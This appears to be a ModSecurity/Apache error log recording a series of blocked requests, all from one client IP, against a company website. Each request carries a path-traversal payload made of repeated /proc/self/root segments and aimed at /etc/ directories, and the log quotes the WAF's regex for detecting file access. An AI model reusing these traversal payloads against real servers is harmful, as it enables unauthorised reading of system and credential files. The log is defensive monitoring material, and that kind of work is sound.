[Wed Mar 18 14:01:59.242122 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.241.31:37840] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrah-oXxyEfFpUF8f-RtQAAAUI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:02:01.097085 2026] [:error] [pid 17653:tid 140411624429312] [client 74.7.241.31:37852] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abraiMdf6f5d65gmYZT2dQAAAs4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:02:03.195999 2026] [:error] [pid 17653:tid 140411741927168] [client 74.7.241.31:37856] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrai8df6f5d65gmYZT2egAAAsA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:02:04.510142 2026] [:error] [pid 15826:tid 140411616036608] [client 74.7.241.31:37858] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrajOoXxyEfFpUF8f-RvAAAAU8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:02:06.285507 2026] [:error] [pid 15826:tid 140411716749056] [client 74.7.241.31:37860] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrajeoXxyEfFpUF8f-RvgAAAUM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:02:07.923596 2026] [:error] [pid 15826:tid 140411683178240] [client 74.7.241.31:53510] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abraj-oXxyEfFpUF8f-RwgAAAUc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:02:09.240145 2026] [:error] [pid 14269:tid 140411599251200] [client 74.7.241.31:53524] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrakQbLMZ6AikZjR9XhSAAAABE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:02:10.406553 2026] [:error] [pid 11816:tid 140411582465792] [client 74.7.241.31:53528] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrakuw_le52K8_3pV3-5gAAAhM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:02:11.803208 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.241.31:53540] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrak-oXxyEfFpUF8f-RyAAAAVg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:02:13.147526 2026] [:error] [pid 29882:tid 140411574073088] [client 74.7.241.31:53548] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abralUzinOy1jxa1j4c6SgAAARQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:02:14.455108 2026] [:error] [pid 15826:tid 140411716749056] [client 74.7.241.31:53552] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abraluoXxyEfFpUF8f-RywAAAUM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:02:15.747716 2026] [:error] [pid 15051:tid 140411565680384] [client 74.7.241.31:53564] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abralymAPhZkrhU8w4mO4gAAAJU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:02:17.105964 2026] [:error] [pid 30077:tid 140411649607424] [client 74.7.241.31:53578] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abramfu8EFLIOrSqIpsjxQAAAks"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:02:18.518312 2026] [:error] [pid 14269:tid 140411582465792] [client 74.7.241.31:48618] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abramgbLMZ6AikZjR9XhYAAAABM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:02:19.807303 2026] [:error] [pid 15051:tid 140411641214720] [client 74.7.241.31:48624] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abramymAPhZkrhU8w4mO6QAAAIw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:02:22.089928 2026] [:error] [pid 14269:tid 140411716749056] [client 74.7.241.31:48636] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abranQbLMZ6AikZjR9XhZgAAAAM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:02:23.519120 2026] [:error] [pid 11816:tid 140411548894976] [client 74.7.241.31:48640] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abran-w_le52K8_3pV3-7AAAAhc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:02:24.787870 2026] [:error] [pid 14269:tid 140411624429312] [client 74.7.241.31:48656] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abraoAbLMZ6AikZjR9XhaAAAAA4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:02:26.047129 2026] [:error] [pid 31803:tid 140411708356352] [client 74.7.241.31:48664] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abraouyqAr6etmhZHNrpHgAAAEQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:02:27.321542 2026] [:error] [pid 14269:tid 140411641214720] [client 74.7.241.31:58214] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abraowbLMZ6AikZjR9XhagAAAAw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:02:28.640241 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.241.31:58216] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrapNa6ubjKNq_cu4a_9QAAA0A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:02:29.938953 2026] [:error] [pid 17887:tid 140411599251200] [client 74.7.241.31:58226] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrapQkwaGbbGflqUZAytAAAANE"], referer: 